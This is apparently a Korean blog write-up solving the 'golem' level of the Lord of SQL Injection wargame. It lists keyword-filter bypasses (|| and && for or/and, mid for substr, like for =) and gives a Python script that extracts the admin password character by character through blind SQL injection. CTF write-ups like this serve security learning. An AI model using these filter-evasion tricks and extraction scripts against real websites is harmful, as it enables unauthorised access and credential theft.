728x90
반응형
이번 문제도 역시 blind sql injection입니다.
prob _ . ()을 입력하면 No Hack ~_~을
or and substr( =을 입력하면 HeHe를 보여주네요..
or과 and는 ||와 &&으로 변경이 가능합니다.
substr은 mid로 대체가 가능합니다.
=은 like로 대체할 수 있습니다.
or | || |
and | &&(%26%26) |
substr | mid(string, start, end) |
= | like |
이 결론을 도출해내면 풀이는 다른 문제와 다른 부분이 없습니다.
먼저 pw의 길이를 알아봅시다. 8글자군요..!
8자리 비밀번호 중 첫 번째 글자부터 mid를 이용해 뽑아줍니다.
그리고 admin에 해당하면 Hello admin을 출력하기 때문에 무작위 대입 중 Hello admin이 나오는 문자열을 따로 저장해줍니다.
import requests as req
pwd=""
cookies = {'PHPSESSID':'5cbi4j1nqp56sico0e7i70lddb'}
string = "1234567890abcdefghijklmnopqrstuvwxyz"
for i in range(1,9):
for j in string:
url = f"https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php?pw='|| mid(pw,{i},1) like '{j}' -- "
res = req.get(url=url, cookies=cookies)
if 'Hello admin' in res.text:
pwd += j
print(pwd)
728x90
반응형
'보안 > 웹' 카테고리의 다른 글
los darknight (0) | 2022.03.24 |
---|---|
los orge (0) | 2022.03.24 |
los orc (lord of sqlinjection 4번) (0) | 2022.03.22 |
HTTP Method (0) | 2022.02.01 |
textarea사용하기 (0) | 2015.02.15 |
댓글